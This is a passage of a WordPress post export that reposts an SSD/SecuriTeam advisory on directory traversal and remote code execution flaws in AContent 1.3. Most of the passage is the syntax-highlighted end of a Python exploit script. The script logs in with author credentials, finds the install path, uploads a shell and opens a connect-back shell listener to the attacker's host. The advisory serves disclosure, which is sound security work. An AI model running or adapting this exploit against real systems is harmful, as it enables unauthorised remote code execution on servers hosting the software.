class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-184\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-185\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-186\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">validation_of_args_are_good<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-187\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-188\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;validates where the arguments are good or not<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-189\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-190\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">global<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cb_host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">w_lst<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">help_str<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-191\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">help_str<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;%s &lt;target&gt; &lt;author user:pass&gt; &lt;connectback host:port&gt;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-192\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-193\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print <\/span><span class=\"crayon-e\">help_str<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-194\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-195\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-196\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">user_pass<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-197\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">host_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-198\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host_port<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-199\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) your connectback host must be in &lt;host:port&gt; format&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-200\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-201\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">elif<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_pass<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-202\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) your student username and password must be in &lt;user:pass&gt; format&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-203\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-204\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host_port<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-205\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cb_host<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host_port<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-206\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_pass<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-207\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_pass<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-208\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">isdigit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-209\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) you need a port NUMBER for the command back host&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-210\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-211\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">elif <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">access<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getcwd<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">W_OK<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-212\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) dont have write access in current dir!&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-213\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-214\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-215\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-216\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-217\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-218\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">global<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">s<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-219\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">Session<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-220\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">banner<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-221\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">validation_of_args_are_good<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-222\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">we_can_login<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-223\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) logged in successfully&#8230;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-224\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) finding full path&#8230;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-225\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">we_can_get_fp<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-226\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(!) found the path at: %s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fp<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-227\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) uploading shell&#8230;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-228\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">we_can_upload_a_shell<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-229\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(!) shell upload successful, launching!&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-230\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">instance<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">threaded_tcp_server<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;0.0.0.0&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">connect_back_shell<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-231\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cbserver<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">threading<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">Thread<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">instance<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">serve_forever<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-232\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cbserver<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">daemon<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-233\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cbserver<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">start<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-234\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">pop_shell<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-235\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-236\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print <\/span><span class=\"crayon-e\">help_str<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-237\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-238\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-239\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__name__<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;__main__&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-240\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0243 seconds] -->  <\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3207\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 16 May 2017 05:32:18 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes two (2) vulnerabilities types found in AContent version 1.3. AContent is an open source learning content management system (LCMS) used to create interoperable, accessible, adaptive Web-based learning content. It can be used along with learning management systems to develop, share, and archive learning materials. For those familiar with ATutor, &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3207\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 AContent Multiple Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11680,11682,10757],"class_list":["post-7664","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-directory-traversal","tag-remote-code-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7664","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7664"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7664\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7664"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7664"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7664"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}